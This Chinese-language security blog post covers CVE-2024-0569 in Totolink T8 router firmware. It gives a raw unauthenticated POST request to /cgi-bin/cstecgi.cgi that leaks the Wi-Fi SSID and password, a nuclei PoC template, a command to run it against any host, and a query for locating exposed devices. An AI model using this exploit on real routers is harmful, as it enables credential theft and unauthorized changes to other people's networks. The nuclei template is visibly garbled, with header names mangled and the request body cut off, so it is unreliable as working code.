免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
应粉丝要求小编将往期poc和我在网上收集的一些poc打包分享到网盘了。同时分享了大量电子书和护网常用工具,在文末免费获取。
01
—
漏洞名称
02
—
漏洞影响
Totolink T8 4.1.5cu.833_20220905版本
03
—
漏洞描述
该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。允许远程攻击者在不登录的情况下通过端口80、路径/cgi-bin/cstecgi.cgi、参数topicurl获取Wi-Fi系统信息并修改系统相关设置。
该版本不验证管理员是否登录,因此攻击者不需要带入管理员登录后获取的Cookie,可以直接获取Wi-FiSSID和Wi-Fi密码。
发送修改系统设置的请求而不引入任何cookie可以修改系统设置,在正常和安全的情况下,必须验证cookie是在管理员登录后引入的。
攻击者可以远程发起攻击。该漏洞已經公开披露並可能被滥用。升級到版本4.1.5cu.862_B20230228可以解決此问題。
04
—
title="TOTOLINK"
如果有哪位道友知道怎么筛选具体版本的话可以私信告诉我下
05
—
漏洞复现
向靶场发送如下数据包
在没有任何会话的情况下,可以在任何设置下修改路由器
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close
{
"topicurl":"getSysStatusCfg",
"token":""
}
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: CVE-2024-0569
info:
name: totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露漏洞
author: fgz
severity: high
description: |
T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler組件的getSysStatusCfg功能。将参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已經公开披露並可能被滥用。升級到版本4.1.5cu.862_B20230228可以解決此问題。
reference:
None
metadata:
verified: true
1 :
"totolink" :
tags: cve-2024
http:
raw:
|
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: {{Hostname}}
41 :
Accept: application/json,text/javascript,*/*;q=0.01
XMLHttpRequest :
Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36 :
application/x-www-form-urlencoded:charset=UTF-8 :
Origin: {{BaseURL}}
Referer: {{BaseURL}}/advance/index.html?time=1671152380564
gzip,deflate :
zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7 :
Connection: close
"getSysStatusCfg","token":""} :
matchers:
type: dsl
dsl:
"status_code == 200 && contains(body, 'ssid') && contains(body, 'key') && contains(body, 'channel')"
condition: and
运行POC
nuclei.exe -t mypoc/cve/CVE-2024-0569.yaml -u http://x.x.x.x
07
—
修复建议
Totolink表示,该漏洞已完全修补版本4.1.5cu.862 B20230228和最新的修补版本可以下载在
https://download.totolink.tw/uploads/firmware/T8/TOTOLINK_T8_V4.1.5cu.862_B20230228.zip
08
—
原文始发于微信公众号(AI与网安):CVE-2024-0569
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论